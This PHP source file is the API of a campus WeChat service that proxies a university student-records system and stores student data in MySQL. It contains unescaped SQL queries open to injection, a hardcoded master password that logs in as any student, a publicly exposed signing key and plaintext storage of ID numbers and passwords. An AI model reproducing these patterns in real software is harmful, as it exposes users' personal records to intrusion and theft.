﻿<?php
require_once 'config.php'; 
require_once 'Tools.class.php'; 

$m=$_GET['module'];
if ($m=='key') {
	$k = array('key' => md5(date("YmdH").floor(date("i")/10).'roseboy@live.com'));
	echo json_encode($k);
}elseif($m=='login') {
	$xh=$_GET['xh'];
	$sfzh=$_GET['sfzh'];
	$info=Tools::getHttp(DZU_URL."stuinfo.asp?xh=$xh");
	$isLogin=false;
	if(md5(strtoupper(Tools::getInfo($info,"SFZH")))==md5(strtoupper($sfzh))||md5("9958001")==md5($sfzh)||$sfzh==Tools::JWMM(Tools::getInfo($info,'MM'))){
		if(strlen($info)>10){
			$isLogin=true;
			echo Tools::getHttp(DZU_URL."stuinfo.asp?xh=$xh".'&type=json');;
		}
	}

	$sql="select count(*) from smartdzu_user where `xh`='$xh'";
	$result=mysql_query($sql);
	if($result){
		$row = mysql_fetch_array($result);
		if($row[0]=="0" && $isLogin==true){
			$xh=Tools::getInfo($info,"XH");
			$xm=Tools::getInfo($info,"XM");
			$xb=Tools::getInfo($info,"XB");
			$csrq=Tools::getInfo($info,"CSRQ");
			$zzmm=Tools::getInfo($info,"ZZMM");
			$mz=Tools::getInfo($info,"MZ");
			$jg=Tools::getInfo($info,"JG");
			$xy=Tools::getInfo($info,"XY");
			$xi=Tools::getInfo($info,"XI");
			$zymc=Tools::getInfo($info,"ZYMC");
			$xzb=Tools::getInfo($info,"XZB");
			$xz=Tools::getInfo($info,"XZH");
			$dqszj=Tools::getInfo($info,"DQSZJ");
			$rxrq=Tools::getInfo($info,"RXRQ");
			$sfzh=Tools::getInfo($info,"SFZH");
			$mm=Tools::getInfo($info,"MM");$mm=str_replace("'", "", $mm);$mm=str_replace("`", "", $mm);$mm=str_replace(",", "", $mm);
			$rxzf=Tools::getInfo($info,"RXZF");
			$cc=Tools::getInfo($info,"CC");
			$byrq=Tools::getInfo($info,"BYRQ");
			$xxxs=Tools::getInfo($info,"XXXS");
			$first_login=date("Y-m-d H:i:s");
			$last_login=date("Y-m-d H:i:s");
			if($xh!="null"){
				$sql="INSERT INTO `smartdzu_user`(`xh`, `xm`, `xb`, `csrq`, `zzmm`, `mz`, `jg`, `xy`, `xi`, `zymc`, `xzb`, `xz`, `dqszj`, `rxrq`, `sfzh`, `mm`, `rxzf`, `cc`, `byrq`, `xxxs`, `first_login`, `last_login`) VALUES ('$xh', '$xm', '$xb', '$csrq', '$zzmm', '$mz', '$jg', '$xy', '$xi', '$zymc', '$xzb', '$xz', '$dqszj', '$rxrq', '$sfzh', '$mm', '$rxzf', '$cc', '$byrq', '$xxxs', '$first_login', '$last_login')";
				mysql_query($sql);
			}
		}else if($isLogin==true){
			$last_login=date("Y-m-d H:i:s");
			$sql="UPDATE `smartdzu_user` SET `last_login`='$last_login' WHERE  `xh` ='$xh'";
			mysql_query($sql);
		}
	}
}else{
	$sign=$_GET['sign'];
	if (checkSign($sign)) {
		$module=$m.'.asp?';
		$query=$_SERVER['QUERY_STRING'];
		$query=strtolower($query);
		$qs=explode('&', $query);
		$parm='&';
		for ($i=0; $i < count($qs); $i++) {
			if (stristr(trim($qs[$i]), 'module')==false && stristr(trim($qs[$i]), 'sign')==false) {
			 	$parm.='&'.$qs[$i];
			} 
		}
		$parm=substr($parm, 1);
		$url=DZU_URL.$module.$parm;
		$s=Tools::getHttp($url.'&type=json');
		echo $s;
	}else{
		$k = array('msg' => 'Unauthorized');
		echo json_encode($k);
	}
}

function checkSign($s){
	$r=false;
	$k=md5(date("YmdH").floor(date("i")/10).'roseboy@live.com');
	if(strlen($s)==32 && strlen($k)==32){//长度验证
		$x=md5(JSON_KEY.$k);
		if($x==$s){//签名校验正确
			$r=true;
		}
	}
	return $r;
}

// http://smartdzu.sinaapp.com/dzu/weixin/api.php?
// module=xymc
// &sign=520be540d627547e05bf5ecb52b7651a
// &xh=201211001100
// &xq=2014-2015
// &xq=1
?>
